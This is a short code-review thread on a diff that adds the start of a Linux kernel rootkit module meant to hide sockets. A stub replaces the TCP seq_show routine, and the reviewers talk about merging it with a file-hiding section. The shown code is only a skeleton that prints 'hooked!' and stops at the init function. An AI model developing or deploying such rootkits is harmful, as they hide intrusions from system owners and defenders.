hideSocket/driver_hideSocket.c

```diff
@@ -0,0 +1,44 @@
+
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/kallsyms.h>
+#include <linux/seq_file.h>
+
+#include "hfiles/hardware.h"
+#include "hfiles/inlHook.h"
+
+// default configuration...
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("dan0xcc");
+MODULE_DESCRIPTION("files hider rootkit driver"); 
+MODULE_VERSION("1.00");
+
+static int my_tcp4_seq_show(struct seq_file *file, void *v)
+{
+
+    printk(KERN_INFO "hooked!\n"); 
+    
+    return 0; 
+};
+
+static int __init rootkit_init(void) {
```

Comment:
Merge the secions to one rootkit that currently hiding a file and a socket

Reply:
Can I do it when I will finish the section number 3? I want to keep it clear 😄

Reply:
yeah